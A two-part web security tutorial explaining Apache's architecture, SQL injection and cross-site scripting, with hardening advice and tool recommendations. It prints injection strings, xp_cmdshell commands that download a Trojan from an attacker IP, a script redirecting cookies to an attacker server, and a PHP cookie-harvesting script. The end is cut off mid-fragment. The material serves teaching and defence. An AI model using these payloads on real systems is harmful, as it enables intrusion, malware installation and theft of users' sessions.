Targeted at readers with Web security concerns, information security experts, systems administrators and all those who want to jump-start their careers in Web security, this series of articles intends to cover the strengthening of Web applications and the Apache Web server framework, as well as any possible attacks against both.
With about a 54-56 per cent share of the Web server market, according to a survey by news.netcraft.com, Apache is the second most famous project in the open source world, after Linus Torvalds’ Linux kernel. It is, indeed, a de facto standard for Web applications. However, because of the high market share, it has always been a hunting ground for attackers, and is still vulnerable to many known and unknown malicious attacks. An unsecured Apache server can have a devastating effect on your website, the server as a whole, and also on your reputation, if your site is broken into.
However, the response to that is to secure our Web applications and Web server framework—and that’s what we will be doing in this series. Starting with an introduction to Apache’s architecture, we will look at the many attacks that are possible on your Apache Web server or Web application—and of course, we look at some good security solutions, too. Some golden advice, before we start: read these articles with an attacker’s mindset, to gain the upper hand and keep your server secured.
Dissecting Apache
It’s quite obvious that to secure any system, you need to start with a good knowledge of its architecture. This section looks at Apache’s innards, making it clear how Apache handles applications and modules. The components shown have high interactivity with each other, and that makes security a complex issue. Each type of external system (a database, an LDAP server, a Web service) uses a different language, and allows for different attack vectors, increasing the chances of a security failure.
Figure 1 illustrates a typical Apache server set-up, with an overview of Apache components.
Figure 1 illustrates a typical Apache server set-up, with an overview of Apache components.
The core of Apache implements the basic functionality of the Web server. The following are its main components:
1. http_protocol.c —contains functions that handle all the data transfers to the client, following the HTTP protocol.
2. http_request.c —handles the flow of request processing, and controls the dispatching of work to modules, in the appropriate order. It is also responsible for error handling.
3. http_main.c —starts up the server; this contains the main server loop that waits for, and accepts, connections. It is also in charge of managing time-outs.
4. http_core.c —is the base component that implements Apache’s basic functionality. Although this component also uses the Apache module API, it is a special one; it has a non-standard file name, http_core, instead of the expected mod_core. It behaves like a module, but has access to some globals directly, which is not characteristic of a module.
5. http_config.c —is responsible for managing information about virtual hosts and reading configuration files; it also maintains a list of modules that are called in response to requests.
Apache also supports a variety of features, many implemented as compiled modules, which extend the core functionality. These can range from CGI or PHP support, to authentication and logging schemes. Modules do not interact directly with one another; they interact through the core, since the core contains linked lists of installed modules and their handlers. Each module has handlers defined for it—for actions like sending a file back to the client (send-as-is handler), treating a file as a CGI script (cgi-script handler) or parsing it for SSI (server-side includes—the server-parsed handler), and many others. Each handler represents a specific action to be performed when a request is received. The core calls the specific handler, thus invoking the module that has defined that handler, for a specific request.
After successful installation and basic configuration of Apache, the first thing you need to do, from the security perspective, is to carefully select your active module set. You should disable the enabled modules (by default) like mod_info, mod_status, mod_userdir and mod_include, unless you have a sound reason for keeping them enabled.
Why, you may well ask. It’s simple—they can expose your server to attack, or yield useful information to an attacker. The first two modules expose the Web server configuration and real-time information as Web pages. The mod_userdir module allows each user account on the server to have a personal website in the home directory, accessible via a /~username alias. Apache returns error 404 when a user account, whose personal site is requested, doesn’t exist; and it returns error 403 when a website is not found in that user’s home folder. The errors generated expose valid user account names on the server; it is a common ploy for attackers to try to log in to the server with these discovered accounts, and with commonly used weak passwords. Once they obtain a shell session on the server, there are several privilege-escalation techniques they can try to become the super-user.
The mod_include module provides scripting functionality. Though powerful, there are many malicious exploits available that are designed specifically for this module. Disable it if you don’t need it!
Phases in Apache request processing
For Apache to return a complete response to a client request, more than one module is needed. As already noted, all the modules communicate with or respond to each other through the core. Thus, control is switched back and forth between the core and different modules. All this is done by dividing the request into a set of different phases; let’s look at each of the typical request-to-response phases.
URI to file-name translation phase
In a normally configured server, two basic modules, mod_userdir and mod_rewrite, are used in this phase. (However, you should already have disabled mod_userdir, for reasons stated above.) The mod_rewrite module provides you with a flexible mechanism for rewriting the requested URL to a new one. It uses custom rules, which state that if a predefined pattern is found in the requested URL, then it is rewritten to a new one. It is a good idea to install this module, since it reduces the chances of malicious codes in the URL (such as local and remote file inclusions, which we’ll discuss in upcoming sections).
Note: URI (Uniform Resource Identifier) is the generic term for a family that includes Uniform Resource Names (URN), Uniform Resource Characteristics (URC), Location-Independent File Names (LIFN), and of course, the URL, the grand daddy of them all.
The authentication and authorisation phase
This phase has sub-phases:
1. Checking the host address and other available information: Here, mod_access comes into the picture. Basically, mod_access enables you to authorise access based on the host name or IP address from which the request came.
2. Authenticating user ID in the HTTP request: Here mod_auth, the default authentication module, is used. It enables you to authenticate users whose credentials (a username and an encrypted password) are stored in text files. From the security perspective, this module is not recommended, since it is not designed to handle a large number of users. Just a few thousand user requests can cause lookup performance to drop dramatically, which may suggest a syn-flooding DoS attack to an attacker. To deal with this problem, we’ll be using traffic-shaping modules in subsequent sections. The mod_auth_anon module is used for anonymous authentication.
Determining the MIME type of request
In this phase, the content type, encoding, language and other related parameters of the request are worked upon. The mod_mime and mod_mime_magic basic modules are used here. The former enables Apache to determine MIME type by using file extensions, and provides clients with meta-information about documents. It also enables you to define a handler to determine how the document is processed. The mod_mime_magic module does the same task, but by comparing the first few bytes of the file with a magic value stored in a file. It is only needed when mod_mime fails to determine a known MIME type.
The fixing-up phase
The mod_alias module works to map one part of the user-perceived file-system to another. For example, if a request is received for http//www.site.com/info/info.php, then it can be redirected to http//www.site.com/info/lfu/info.php. In such tasks, mod_rewrite has the upper hand over mod_alias since mod_rewrite can also map URLs with different host-names, and can perform complicated tasks such as manipulating the query string. Also in this phase, the mod_env module is used to enable you to pass environment variables to external programs, such as CGI, PHP, mod_perl scripts, or SSIs.
The response phase
This phase can use different modules to create a response. For example:
mod_asis can be used for static pages; it enables you to send documents ‘as-is’ to clients, without HTTP headers. This can be useful when redirecting clients without the help of any scripting.
mod_cgi invokes CGI scripts and returns the result.
mod_include handles server-side includes. (Typically, an SSI is an HTML page with embedded commands for Apache and many others.)
The request logging phase
Knowing who (or what) is accessing your website is very important for security reasons. Apache provides you with mod_log_config, which is responsible for basic logging, and writes CLF files by default. In addition, mod_usertrack can log information on cookies, which is also crucial.
You can look at http://httpd.apache.org/docs/2.0/mod/ for a complete list of modules, with links to pages documenting their use and directives. Module directives are configured in /etc/httpd.conf, Apache’s main configuration file.
These concepts on Apache might have been just revision for you, but we will move to learning how to use these to secure Apache configurations, in articles that follow this one. For now, though, we take a look at something else that is important from the security perspective!
What do you use Apache for? Obviously, to let the world access your Web applications! Now, if your Web application itself has security flaws, then it’s no use trying to create even the most secure configuration for the Apache Web server, because an attacker can enter your site without restriction, through a flawed Web application! This is what our next section focuses on: identifying the potential flaws in your Web application, beginning with the most common ones, and on how to seal the holes so attackers face a much more secured Web application.
Securing your applications—learn how break-ins occur
Figure 2 is a typical client-server Web architecture
Figure 2 is a typical client-server Web architecture
Shown in Figure 2 is a typical client-server Web architecture, which also indicates various attack vectors, or ways in which Web application attacks affect the regular data flow. We will cover each of these in this series of articles, beginning with injection flaws.
Injection flaws are so named because when they are used, malicious attacker-supplied data flows through the application, crosses system boundaries, and gets injected into other system components. These are fairly dangerous attacks, and mostly work because a string that is harmless for PHP (or another website scripting language) can turn into a dangerous weapon when it reaches the database. Such flaws and attacks are particularly important, since they can affect any dynamic Web application that has not been tested and carefully secured against such holes. We will now take a closer look at the most often encountered injection flaw, SQL injection.
SQL injection
SQL injection is an exploit in which the attacker injects SQL code into a request to the server (generally through an HTML form input box), to gain access to the back-end database, or to make changes in it. If not sanitised properly, SQL injection attacks on your Web application could allow attackers to even ruin your website, besides extracting confidential data. Website features such as login pages, feedback forms, search pages, shopping carts, etc, that use databases, are more prone to SQL injection attacks. The attacker injects specially crafted SQL commands or statements into the form, trying to achieve various results.
Almost all scripting technologies—ASP, ASP.NET, PHP, JSP and CGI, are vulnerable to this attack if they use MS SQL Server, Oracle, MySQL, Postgres or DB2 as their database. Basic knowledge of SQL commands, and some creative guess work, is all it takes to penetrate an unsecured application. Network firewalls and IDSs (Intrusion Detection Systems) might not help, since they provide filters on HTTP, SSL and other Web traffic ports—but the communication with the database is still unsecured. Most programmers are still not aware of the problem, and the scenario seems to be getting worse: the Web security consortium informs us that SQL injection comprised over 7 per cent of all Web vulnerabilities present in every 15,000 applications that it scanned!
Note: SQL injection is a ‘global’ type of attack; it is not restricted to open source platforms, databases or applications, as you can see from the inclusion of proprietary software products in the list above.
SQL injection via a login form
Let’s take a common vulnerable code snippet in an ASP page, which generates a login validation query that is meant to be run on an MS SQL server database:
var sql = “SELECT * FROM Users WHERE usr= ‘ ” + user + ” ‘ AND password=’ ” + paswd + ” ‘ “;
In case a valid user enters (into the ASP login page) his username as ‘arpit’, and his password as ‘bajpai’, then the generated query becomes:
SELECT * FROM Users WHERE usr=’arpit’ AND password=’bajpai’
That’s pretty innocuous, and exactly what the person who wrote the ASP code intended. However, note what happens if an attacker submits malicious text in the username field—something like “ ‘ or 1=1 –” , then the query becomes…
SELECT * FROM Users WHERE usr=’ ‘ or 1=1 — AND password=’ ‘
Because a pair of hyphens designates the beginning of the comment in SQL Server’s T-SQL, the effective
query is now:
SELECT * FROM Users WHERE usr=’ ‘ or 1=1
For readers who don’t know SQL, this translates to, “where the user field is blank, OR 1=1”. The trick is that for the logical OR condition, this will always evaluate to True, since one of the operands to the OR statement is True. Thus, this query returns multiple user records, which validates the malicious login!
It doesn’t stop there, however: since most Web applications have their ‘administrator’ user account added to the Users table as the first thing during development, the ASP code in the login page sees that record as the first returned record, and assumes it is the admin user logging in! A person, who doesn’t even know a valid username and password, is given administrative permissions in your Web application…
SQL injection via query string (URL)
An attacker might also attempt an SQL injection attack by adding SQL to the URL. How does that work? Let’s look closely at an example. Assume a database with table and rows as created and populated by this SQL:
CREATE TABLE Products
(
ID INT identity(1,1) NOT NULL,
prodName VARCHAR(50) NOT NULL,
)
INSERT INTO PRODUCTS (prodName) VALUES (‘Dell laptops’)
INSERT INTO PRODUCTS (prodName) VALUES (’Nokia express music’)
INSERT INTO PRODUCTS (prodName) VALUES (‘Samsung dual sim range’)
Let’s also assume that we have the following ASP script, called products.asp, on the site; it uses the database with the above table.
If we visit products.asp in our browser with the (normal) URL: http://www.example.com/products.asp?productId=1 then we will see the result is “Got product Dell laptop”. The parameter is taken directly from the query string (submitted URL) and concatenated to the WHERE clause of the query, so the query generated by passing productId=1 in the URL is:
SELECT prodName FROM products WHERE id = 1
Now, if the attacker tampers with the URL and submits something like http://www.example.com/products.asp?productId=0 having 1=1 then the constructed query becomes:
SELECT prodName FROM products WHERE id = 0 or 1=1
This would
Figure 3- SQL vulnerability error
Figure 3- SQL vulnerability error
, or something similar. You can also see the error exposing the products fields such as products.prodName. The attacker can use this information maliciously, to insert or delete data from the table. For example, here is a sample malicious query injection:
http://localhost/products.asp?productId=0;INSERT INTO products(prodName) VALUES(left(@@version,50))
Basically, it returns “No product found”; however, it may also run an INSERT query, adding the first 50 characters of SQL Server’s @@version variable (which contains the details of SQL Server’s version, build, etc) as a new record in the Products table. The attacker can then use this information to research specific exploits for that version of SQL Server.
Many programmers might suggest that they use double quotes instead of single quotes for security, but this is only a halfway measure because there are always numeric fields or dates within forms or parameters, which will still remain vulnerable just like the example shown below, using PHP/MySQL, which takes a query that uses no single quotes as part of the syntax.
$a = “SELECT * FROM accountsWHERE account = $acct AND pin = $pin”;
Now, the attacker injects, into the HTML form fields meant to accept numbers, as $acct= a or a=a # $pin = 1234. The resultant query would be like the following:
SELECT * FROM accounts WHERE account = a or a=a# AND pin = 1234
(In this case, the comment character is # instead of the double dash because the database is MySQL. Other such strings used by attackers are ‘ or a=a — , ‘ or ‘x’=’x, 1’ or ‘1’=’1, ‘ or 0=0 #, “ or “a”=”a, ’) or (‘a’=’a), etc. Notice the power of single quotes in such strings.
Running system commands on SQL Server
By attacking an SQL Server, an attacker can also gather IP address information through reverse lookups, by running system commands. For example (a.b.c.d represents the attacker’s IP address):
‘;EXEC master..xp_cmdshell “nslookup example.com a.b.c.d”
When this fragment is injected, the SQL back-end will now execute an nslookup using the attacker’s system as the name server. Attackers can use multiple methods, including a network sniffer like tcpdump, on their box, to find the IP address that made the DNS query. If it is a public IP address, the attackers have gained crucial information: they can then compile and launch exploits against that IP address, which are tailored to the operating system and database software.
It is sometimes possible, even if the SQL Server machine doesn’t have a public IP address, that an attacker can download a Trojan or backdoor program onto the SQL Server (a.b.c.d is the IP address of a server hosting the malware program):
‘;EXEC master..xp_cmdshell “tftp –i a.b.c.d GET Trojan.exe c:\Trojan.exe”
The downloaded program could be launched with another xp_cmdshell invocation. It could do many things at this point, including connecting outward to the attacker’s IP address, to provide the attacker with a direct channel to command the server operating system. If the SQL Server software is running as the Windows Administrator user, which is an all too common shortcut that people take when installing—then the attackers now effectively ‘own’ the server. They can then transfer files from the server, using tftp, which could include confidential, financial or even system password files.
More than that, the attackers are now ‘inside’ the private network—they can locally access other systems on the LAN, and try to break into them, something that they could not do directly because the LAN was protected by a firewall blocking connections from the Internet, except for proper requests like HTTP/HTTPS to the Web server.
If you want more practical examples of this attack vector, there are a whole bunch of videos available on YouTube and Metacafe. I would like to reiterate here that neither I nor LFY aims to teach readers to attack servers; this is meant to give you knowledge that you need in order to protect your own infrastructure.
Penetration-testing for the SQL injection vulnerability
Let’s take a look at the methodology adopted by many penetration testers to check for SQL injection vulnerability.
Scanning for entry points
This initial stage is to find vulnerable entry points such as fields in entry forms, values stored in cookies, and hidden fields. For this, the fuzzing technique is used to send specific string combinations with SQL characters and words. An unexpected error response, or a change in application behaviour, indicates a vulnerable point that may afford an attacker entry.
“Fuzzing”
Fuzzing is an automated software testing technique that provides invalid, unexpected data as input to the application. If the application responds unexpectedly, or shows reduced performance, it can be noted for further action.
Information gathering
The next step is to gather as much information as possible about the underlying application, by going through the following steps:
1. Errors in responses: For the attacker, the easiest situation would be to have the results of the modified query displayed as part of the Web server’s response. If the Web server (Apache, in this case) is configured to display error messages, a lot of information can be extracted through them. For example, a 403 error page on Apache’s website shows apache/2.2.12 (unix) mod_ssl/2.2.12 openSSL/0.9.7d mod_wsgi/3.2 python/2.6.5rc2 server at httpd.apache.org port 80. The information includes specific software component information and version numbers, including the version number of Apache. This can be used by attackers to run exploits known to work for a particular version. Moreover, database error messages may also leak information about the table or database structure—for example, an error message saying that some columns have not been grouped, when you inject a HAVING clause into a SELECT statement.
2. Guessing the database: Most of the time, error responses also help in guessing the databases in use. For example, if the Web server is Apache, and the website is built using PHP, then chances are the database is MySQL. If the website is in ASP, then it’s likely that it uses an MS SQL Server database. However, a more effective way of distinguishing databases is the table provided by the OWASP Web application security project, which is shown in Figure 4. You can relate keywords in error messages from queries that you inject, with those in Figure 4, to guess the database.
3. Understanding the query: It is important to know in what kind of query, and in which part of the query, our injection landed. It could be part of a SELECT, UPDATE, EXEC, INSERT, DELETE or CREATE statement—or could be part of a sub-query too. Start by determining which field is doing what with your input. For example, in the ‘Change Your Password’ page, the SQL code may be: SET password = ‘new password’ WHERE login = user AND password = ‘old password’. Here, if you inject a new password and a comment character in the ‘New Password’ field, you may end up changing every password in the table to the one you specified. In the same manner, we can guess a SELECT query structure, for example, by looking at the output of ‘ and ‘1’=’1 and ‘and ‘1’=’2. You can also generate specific errors to determine table and column names, like: ‘ GROUP BY columnnames HAVING 1=1 –
You can inject entire queries after a query termination character, as we saw earlier, to help in determining table names and columns. For MySQL, the query is SHOW columns FROM tablename, while in Oracle it would be SELECT * FROM tab_column WHERE table_name= ‘tablename’. Similarly, DB2, Postgres, etc, have their own syntax.
4. Time to penetrate: Once basic information about the database, the query structure and privileges is known, the penetration is started. Extracting data is easy once the database has been enumerated, and the query is understood. For example, to get the password for the login name admin we would try the malicious URL: http://www.example.com/products.asp?id=0;UNION SELECT TOP 1 password FROM account_table WHERE login_name=’admin’– . The same applies to any other specific login name. You can also extract a password from hashes by converting the hashes kept in binary form to a hex format, and that can be displayed as part of an error message.
We have covered a lot about SQL injection attacks so far, but if you want to know more, explore the references at the end of the article. Now, the biggest question left to be answered is: How do we make our present Web applications attack-proof—or at least, as hostile as possible to malicious SQL injectors? The answer is, carefully follow these tips given below:
1. The best way to check whether your website and applications are vulnerable to SQL injection attacks is by using automated and heuristic Web vulnerability scanners (see the ‘Web App Security Checking’ box). These can also check for cross-site-scripting attacks, and many more attacks that we will be dealing with in later articles.
2. Input validation is the most important part of defending yourself against SQL injection. If the input is supposed to be numeric, use a separate variable in your server-side scripts to store it, and reject bad input, rather than attempting to escape or modify it.
3. Implement filters against keywords like “select”, “insert”, “update”, “shutdown”, “delete”, “drop”, and special characters like “–”, “‘”. Also, don’t do these validations in Javascript/on the client side; rather, do such filtering at the server side itself. Not only will smart attackers figure out how to bypass your Javascript, they will also learn exactly what special filters you have, when they view the Javascript.
4. Try to use encrypted cookies, and not to store values in hidden fields.
5. Make sure you run database services as a low-privilege user account. Remove unused stored procedures and functionality, or restrict access to those, to administrators. Also change permissions and remove “public” access to system objects. If the application only requires read access to certain tables, then the account for that application must be limited to read access only. Don’t forget to firewall the server so that only trusted clients can connect to it.
6. Close off linked servers, such as FTP servers or Samba services that connect to the same system on which your database runs. Also, close unused network protocol ports, such as telnet and TFTP ports, when you don’t need them. This restricts attackers trying to upload Trojans or root-kits into your system through these ports.
7. Avoid using different databases linked together by a single application, as they may create code complexity, which ultimately may create loopholes for intruders.
8. As far as passwords are concerned, keep auditing them and change them regularly. Use complex passwords that are above 16 characters in length—this makes it hard for many brute-forcing programs to crack them. You can also set password validations that ask users to enter complex passwords. Encrypt and hash passwords and other sensitive data; never store them in clear-text. Encrypting connection strings is also a good practice.
9. Add extra code in your scripts to log IP addresses that visit your site, and block suspicious IPs. You can also add scripts to show warnings like, “WARNING: Attacker, your IP address x.y.z.w has been logged. Legal action will be taken against you if your intentions are malicious.”
10. If you can, use databases which are not commonly used, because they should have less known exploits against them. Regularly consult your system vendor for security and performance hot-fixes and related patches.
11. Use these tools of the security industry:
SQLninja is an automatic testing tool to exploit SQL-injection-vulnerable applications. It performs extensive DBMS back-end fingerprinting and brute forcing on account passwords. View more details at http://www.sqlninja.sourceforge.net.
Greensql is an open source database firewall that tries to protect against SQL injection errors. View its documentation at http://www.greensql.net/.
You can also go for the SQL injection blocking tool, SQLblock ODBC edition. It has an SQL injection prevention feature, which works as an ordinary ODBC/JDBC data source, and monitors every SQL statement being executed. It alerts the administrator if any malicious or forbidden SQL statement is encountered.
Since SQL injection has the dubious distinction of being the attack that any malicious attacker learns first, it is the first we have covered, and in depth. For more detailed information on SQL injection and other programming defences, don’t forget to visit www.owasp.org. We will deal with cross-site scripting, command execution and many other dangerous attacks on Web applications and Apache in the next article. Meanwhile, you can send your queries and constructive feedback to abajpai75 AT yahoo DOT com. Always remember: know hacking, but no hacking.
II.
In the previous article in this series, we started our journey to a secured Apache by dissecting its internals. We then looked at various attacks against Web applications via injection flaws, beginning with SQL injection. In this article, we will deal with another category of injection flaws: Cross-Site Scripting, a.k.a. ‘XSS’. I would like to reiterate here that neither I nor LFY aim to teach readers to attack servers; this is meant to give you the knowledge that you need to protect your own infrastructure.
Grabbing second position in OWASP’s latest Top Ten critical Web application security risks —after SQL injection flaws—is XSS. (By the way, the different first letter is used to avoid confusion with CSS—Cascading Style Sheets.) The security consortium says that XSS accounts for about 39 per cent of vulnerabilities in Web applications.
So what is XSS?
OWASP defines XSS as a flaw that occurs when an application includes user-supplied data in a page sent back to the browser, without properly validating or escaping that data. XSS attacks are essentially code-injection attacks, which exploit the interpretation process of the Web application in the browser. These attacks are carried out mainly on online message boards, Web logs, guest books, and user forums (collectively called ‘boards’, in the rest of the article), where messages are permanently stored. They are created using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side scripting technologies.
The goal of an XSS attack is to steal client authentication cookies, and any other sensitive information that can authenticate the client to the website. With a captured (legitimate) user token, an attacker can impersonate the user, leading to identity theft.
Unlike most attacks, which involve two parties (the attacker and the website, or the attacker and the victim/client), the XSS attack involves three parties: the attacker, the victim/client, and the website. An XSS attack tricks a legitimate user by posting a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the users once they click the link. This seemingly harmless website can be (and is, in many cases) a phishing clone of a page in the original website the user is browsing; it may prompt users for their username and password. Alternately, it may be just a ‘thank you’ page, which steals the users’ cookies in the background, without their knowledge.
Phishing
Phishing is an Internet scam where the user is convinced to supply valuable information (such as the username and password) to a malicious website that has been designed to closely resemble a legitimate website. The user is directed to it via links in bulk/spam e-mails, instant messages, etc. The majority of these can be avoided by carefully scrutinising the links and not clicking doubtful links; also check the URL bar (address box) of the browser to verify if you have arrived at a trusted site, before you enter your login credentials.
How an XSS attack works
XSS exploit code is typically (but not always) written in HTML/JavaScript to execute in the victim’s browser. The server is merely the host for the malicious code. The attacker only uses the trusted website as a conduit to perform the attack. Typical XSS attacks are the result of flaws in server-side Web applications, and are rooted in user input which is not properly sanitised for HTML characters. If the attackers can insert arbitrary HTML, then they could control the execution of the page under the permissions of the site. Common points where XSS opportunities exist for an attacker are ‘confirmation’ or ‘result’ pages (for example, search engines that echo back the user-input search string) or form-submission error pages that help the user by filling in parts of the form which were correctly entered.
A simple PHP page containing code like the following, is vulnerable to XSS!
Once the page containing this code is accessed, the variable sent via the GET method (a.k.a. querystring) is output directly to the page that PHP is rendering. If you pass legitimate data (for example, the string “Arpit Bajpai”) as an argument, the URL would be something like http://localhost/hello.php?name=Arpit%20Bajpai (assuming you’re running the server locally on your system, which you should be if you’re trying this out). The output of this is harmless, as shown in Figure 1.
Now, for a little tampering in the URL, we change it to:
http://localhost/hello.php?name=
Hacked
The result is shown in Figure 2. It still looks relatively innocuous, but the fact that the input is not validated by the PHP script before outputting it to the victim’s Web browser opens the way for more harmful HTML to be included into the vulnerable page.
As in most cases, the main aim of an XSS attack is to steal the user’s authentication cookie. Shown below is a typical XSS attack attempt that has been done by posting malicious JavaScript to an online message board, and grabbing the user’s cookie.
document.location=”http://attackerserver/cookie.php?c=”+document.cookie
When victims click on the link containing this malicious code, they might get redirected to the home page, but their cookies will be sent to the cookie.php ‘cookie fetcher’ PHP script on the attacker’s server. A typical cookie fetcher script might look like what’s shown below:
<?php
$cookie = $_GET['c'];
$ip = getenv (’REMOTE_ADDR’);
$date=date(”j F, Y, g:i a”);;
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘.$ip.’
Date and Time:
‘.$date.’
Referer: ‘.$referer.’
’);
fclose($fp);
header (”Location: http://www.vulnerablesite.com”);
?>
This file will retrieve the cookies and append them to a cookie.html file on the attacker’s server. Other details saved at the same time include the IP address of the victim’s Net connection, the date and time at which the cookie was fetched, and the HTTP referrer—i.e., the site on which the victim clicked the malicious link to the attacker’s cookie.php. With this information, the attacker can then connect to the board website, supplying the captured cookie, and thus pretending to be the victim user.
Now, most savvy victims get suspicious when they are redirected to the home page, or see something unusual, which is not part of the Web application’s normal execution. For such victims, attackers mostly prefer using IFRAMEs in their attack script, like what’s shown below:
When victims click the message with the above script in the body, they will experience nothing unusual in the application’s normal behaviour—yet, their cookies will be sent to cookie.php on the attacker’s server. This is how a typical XSS attack is done.
Types of XSS vulnerabilities
Most XSS vulnerabilities are classified into three types, based on how the attacker exploits the processing of the code they injected, by the Web application. These types are:
Persistent or stored vulnerabilities
Non-persistent or reflected vulnerabilities
DOM-based or local vulnerabilities
Let’s look at each of these in turn.
Persistent or stored vulnerabilities
Figure 3 : Data Hazard
Figure 3 : An attack based on a persistent vulnerability
The persistent XSS vulnerability is the most powerful and effective of all. It exists when data that’s provided to a Web application by a user is first stored persistently on the server (in a database, file system, or other storage), and later displayed to users in a Web page without being properly sanitised. The attack scenario on an online message board, given above, is a classic example of this. An attack based on a persistent vulnerability is visualised in Figure 3. The procedure is that the attacker first injects a malicious script through an input Web form. This is then stored by the server in its database. When any user requests the page, the malicious script is rendered into it. Anyone who clicks the link (or merely views the message, in case of the IFRAME-based attack) becomes a victim, as the malicious script is executed in the victim’s browser, passing the authentication cookies back to the attacker. This type of vulnerability is very effective, since the attacker can target several users of the server—whoever clicks on the link or message.
Non-persistent or reflected vulnerabilities
The non-persistent XSS vulnerability is by far the most widely exploited. This type of XSS vulnerability is commonly triggered by server-side scripts that use non-sanitised user-supplied data when rendering the HTML document. For example, an attacker finds an XSS vulnerability in a Web application, where the application’s script displays the criteria used in the website query, as well as the results for the query. The usual URL in the browser might be http://www.example.com/search.php?query=products. Normally, this link would display products available from the website. Once the attackers find the vulnerability, in an effort to hijack the victim’s credentials, they might post a modified link (which changes the known variables) to the victim:
http://www.example.com/search.php?query=alert(document.cookie)
Clicking this link will cause the victims’ browser to pop up an alert box showing their current set of cookies. This particular example is harmless; an attacker can do much more damage, including stealing passwords, resetting the victim’s home page, or redirecting the victim to another website, by using modified JavaScript code. A visualisation of an attack using a reflected vulnerability is shown in Figure 4.
Now, embedding such bulky scripts might draw the victim’s attention, so attackers simply convert these into hexadecimal format using one of the many converters available, such as http://code.cside.com/3rdpage/us/url/converter.html. Moreover, if the malicious script is quite big, then URL-shortening services like Tiny URL are used to create a short URL that maps to the long one.
DOM-based or local vulnerabilities
DOM-based XSS vulnerabilities exist within the sites’ HTML (as a static script) and can be exploited non-persistently. A brief example of a DOM-based XSS vulnerability would be a static script embedded in a page, which, when executed, uses a DOM function like document.write to display the results of a POST variable. The only real difference in the DOM-based vulnerability is that the server doesn’t send back the results; instead, the DOM parses the code locally, and the malicious script is executed with the same privilege as the browser on the victim’s machine. Consider a scenario where a vulnerable site has the following content (named, for example, http://www.example.com/welcome.html):
var pos=document.URL.indexOf(”name=”)+5;
document.write(document.URL.substring(pos,document.URL.length));
Welcome to our site
…
Normally, the code in this page would welcome the user, if invoked with the following URL:
http://www.example.com/welcome.html?name=Joe
However, a little tampering with this URL results in displaying the users’ cookies in their browser, if they click the URL hyperlink:
http://www.example.com/welcome.html?name=alert(document.cookie)
What happens is that to open this URL, the victim’s browser sends an HTTP request to www.example.com. It receives the above (static) HTML page. The victim’s browser then starts parsing this HTML into DOM. In this case, the code references document.URL, and so, a part of this string is embedded at parsing time in the HTML. It is then immediately parsed, and the malicious JavaScript code passed through the URL is executed in the context of the same page, resulting in an XSS attack.
You might realise here that the payload did arrive at the server (in the query part of the HTTP request), and so it could be detected just like any other XSS attack—but attackers even take care of that with something like the following:
http://www.example.com/welcome.html#name=alert(document.cookie)
Notice the hash sign (#) used here; it tells the browser that everything beyond it is a fragment, and not part of the query. IE (6.0) and Mozilla do not send the fragment to the server, and for these browsers, the server would only see http://www.example.com/welcome.html, with the payload remaining hidden.
Latest trends in XSS
Meta-information XSS (miXSS)
This new type of XSS vulnerability has emerged recently, and exploits commonly used network administration utilities. It is found in those services that utilise valid user-provided input to gather data and display it for the user. It is in this data that the cross-site scripting occurs. Attackers can extract information about network administration utilities. Websites that allow you to perform DNS resolution, and websites that verify SPF records are more vulnerable to miXSS attacks. To learn more about miXSS, check the resources at the end of this article.
XSS Shell
The XSS Shell is a tool that can be used to set up an XSS channel between a victim and an attacker, so that an attacker can control a victim’s browser, sending it commands. The communication is bi-directional.
XSS Tunnel
This is a GPL-licensed open source application written in .NET, and is the standard HTTP proxy which sits on an attacker’s system. It enables tunnelling of HTTP traffic through an XSS channel, to use virtually any application that supports HTTP proxies.
XSS causing DDoS attacks
Recent trends have seen attackers using XSS-vulnerable sites as an initiator step in performing DDoS (Distributed Denial of Service) attacks. They trick users into downloading and installing plug-ins. When the user clicks the download link, besides the plug-in, a worm or bot (in most cases) gets installed in the background. This worm/bot can give the attacker full privileges over the user’s system, and the attacker can then use it to perform DoS attacks, or to spread the botnet.
Botnets
A botnet is an alliance of interconnected computers infected with some malicious software agent (called a bot). Bots are commanded by an operator, and can typically be ordered to send spam mails, harvest information such as licence keys or banking data on compromised machines; or launch distributed denial-of-service (DDoS) attacks against arbitrary targets.
Securing a server against XSS
Cross-site scripting is a potential risk for most Web servers and browsers. Attackers are constantly coming up with new types of this attack, but the following best practices can help you secure your system against attackers.
For clients or users
Take a serious and suspicious view of e-mails or spam mail that contain big, bulky and suspicious URLs. Don’t click such links, even if they are to known and trusted sites. Many of these messages try various tricks to coax you into clicking the link. Some of these include offers to make you financially strong and independent; others threaten that you will lose your account on a (legitimate) website unless you “Confirm your username and password immediately.” Think hard and deep before you click such links, especially with the knowledge you have gained from this article. Obviously, exercise the same level of caution on online message boards and social networking sites as well.
Recent versions of Mozilla Firefox display good security features. For example, Firefox automatically encodes (into %3C and %3E, respectively) in the document.URL property, when the URL is not directly typed into the address bar. Therefore, it is not vulnerable to DOM-based attacks. For additional security, install browser add-ons (extensions) such as NoScript, FlashBlock, and the Netcraft toolbar.
You could also try using the Google Chrome browsers, which are released with integrated XSS protection.
If you run into a doubtful link that you still want to open, if you don’t use Firefox with NoScript, you should disable JavaScript, Java (and Active X, if you’re on Windows) before you click the link. Alternately, visit the website by typing its address directly into your browser.
If a link is to a URL-shortening service like ‘tiny’, ‘tinyurl’, ‘bit.ly’, ’is.gd’, ‘shorturl’, ‘snipurl’ etc, be careful when clicking the link. You may even want to install a second browser for ‘untrusted’ sites; in this browser, do not sign in to any of your trusted and valuable sites, but use it to visit suspicious URLs. If there is actually an attack behind the URL, even if successful, it will probably not net the attacker any useful cookies.
For developers
The best way to check your website for vulnerabilities is to run a Web application security scan against a local copy of it. The best FOSS project available for this is Nikto, which you can get at http://www.cirt.net/nikto2.
The next preferred option is to properly escape all untrustworthy data, based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications. See the OWASP XSS Prevention Cheat Sheet linked in the Resources section for more information about data escaping techniques.
Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users. When filtering dynamic content, select the set of characters that is known to be safe, instead of trying to exclude the set of characters that might be bad. This is preferable because it’s unclear whether there could be any other characters or character combinations that can be used to expose other vulnerabilities.
Check all headers, cookies, query strings, form and hidden fields, and all other parameters against tags such as , , ,
document.badform.submit()
